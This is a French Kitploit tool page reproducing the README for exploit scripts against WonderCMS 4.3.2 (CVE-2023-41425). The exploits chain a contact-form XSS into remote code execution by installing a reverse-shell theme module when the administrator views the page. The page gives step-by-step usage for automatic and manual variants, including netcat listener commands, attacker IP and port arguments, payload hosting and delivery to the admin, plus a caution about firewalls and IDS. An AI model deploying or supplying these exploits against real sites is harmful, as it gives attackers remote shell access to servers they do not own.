Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
Outils/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Génération de PayloadsExploitationShellcodeExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

WonderCMS 4.3.2 Exploits XSS vers RCE

Aperçu

Ces scripts exploitent une vulnérabilité XSS (Cross-Site Scripting) dans WonderCMS 4.3.2 pour parvenir à une Exécution de Code à Distance (RCE). La charge utile XSS, lorsqu'elle est déclenchée par l'administrateur, installe automatiquement un reverse shell sur le serveur cible en exploitant un module de thème malveillant conçu à cet effet. Le reverse shell est obtenu depuis revshells.com et exécuté, donnant à l'attaquant un accès distant au serveur.


Table des matières

  • Prérequis
  • Script 1 : Exploit automatique
    • Fonctionnalités
    • Utilisation
  • Script 2 : Exploit manuel
    • Fonctionnalités
    • Utilisation
  • Remarques
  • Licence

Prérequis

Pour exécuter l'un des scripts avec succès, les outils et conditions suivants sont nécessaires :

  1. Shell Bash : Les deux scripts sont écrits pour des environnements Linux utilisant le shell Bash.
  2. netcat (nc) : Utilisé pour écouter la connexion reverse shell.
  3. Python3 : Un serveur HTTP Python simple est utilisé pour héberger la charge utile XSS.
  4. WonderCMS 4.3.2 : La cible doit exécuter une version vulnérable de WonderCMS.
  5. Interaction de l'administrateur : La charge utile nécessite qu'un administrateur déclenche le XSS, ce qui entraîne l'exécution du reverse shell.
  6. revshells.com : La charge utile reverse shell est téléchargée dynamiquement depuis revshells.com.

Script 1 : Exploit automatique

POC

Image collée 20241010021603

Fonctionnalités

Cette version de l'exploit vérifie automatiquement la présence d'un écouteur nc actif, télécharge le reverse shell, démarre le serveur HTTP, envoie la charge utile et attend que l'administrateur déclenche le reverse shell.

  • Configuration automatique du reverse shell : Télécharge un reverse shell pré-généré depuis revshells.com.
  • Injection de la charge utile XSS : Injecte une charge utile XSS dans le formulaire de contact de la cible.
  • Gestion du serveur HTTP : Démarre automatiquement un serveur HTTP Python pour héberger la charge utile reverse shell.
  • Vérification de l'écouteur nc : S'assure que l'écouteur est en cours d'exécution avant de continuer.
  • Envoi automatique de la charge utile : Envoie la charge utile automatiquement sans interaction de l'utilisateur.

Utilisation

  1. Assurez-vous que l'écouteur nc est en cours d'exécution sur le port spécifié :
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Exécutez le script avec la commande suivante :
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Exemple :
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Workflow

  1. Téléchargement du reverse shell : Le script télécharge le reverse shell depuis revshells.com.
  2. Modification du reverse shell : Le script reverse shell est mis à jour avec l'IP et le port de l'attaquant.
  3. Création de la charge utile ZIP : Un fichier ZIP contenant le reverse shell est créé.
  4. Création de la charge utile XSS : Une charge utile XSS qui installe le reverse shell est générée et injectée dans le formulaire de contact vulnérable.
  5. Démarrage automatique du serveur HTTP : Le script démarre un serveur HTTP Python pour servir la charge utile malveillante.
  6. Envoi automatique de la charge utile : La charge utile XSS est envoyée automatiquement à l'administrateur.

Script 2 : Exploit manuel

POC

Image collée 20241010013048

Utilisez l'exploit fourni par le script dans le champ Site web...

Image collée 20241010013218

Fonctionnalités

Cette version nécessite que l'utilisateur gère manuellement l'écouteur nc et le déclenchement de la charge utile XSS. Elle est plus adaptée aux scénarios où les processus automatiques ne sont pas souhaitables.

  • Configuration manuelle du reverse shell : L'utilisateur est responsable de s'assurer que l'écouteur est en cours d'exécution.
  • Déclenchement manuel du XSS : Le script fournit le lien malveillant à envoyer à l'administrateur, mais la charge utile doit être déclenchée manuellement.
  • Gestion du serveur HTTP : Démarre un serveur HTTP Python pour héberger la charge utile XSS.

Utilisation

  1. Assurez-vous que l'écouteur nc est en cours d'exécution sur le port spécifié :
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Exécutez le script avec la commande suivante :
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Exemple :
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Workflow

  1. Téléchargement du reverse shell : Télécharge un reverse shell depuis revshells.com.
  2. Modification du reverse shell : Met à jour le reverse shell avec l'IP et le port de l'attaquant.
  3. Création de la charge utile ZIP : Crée un fichier ZIP contenant le reverse shell.
  4. Création de la charge utile XSS : Génère une charge utile XSS qui installe le reverse shell.
  5. Affichage du lien malveillant : Affiche le lien qui doit être envoyé à l'administrateur pour déclenchement.
  6. Démarrage du serveur HTTP : Démarre un serveur HTTP Python pour héberger la charge utile.

Remarques

  • Interaction de l'administrateur : Les deux exploits reposent sur le fait que l'administrateur de WonderCMS déclenche la charge utile XSS en visitant la page vulnérable. Une fois déclenchée, le reverse shell est établi avec la machine de l'attaquant.
  • Pare-feu/IDS/IPS : Soyez prudent lors de l'exécution de ces exploits dans des environnements protégés par des pare-feu ou des systèmes de détection d'intrusion (IDS) qui pourraient bloquer ou alerter sur une activité suspecte.
  • Divulgation responsable : Si vous constatez qu'une cible est vulnérable, suivez toujours les directives éthiques et signalez la vulnérabilité aux parties appropriées.
Télécharger l’outil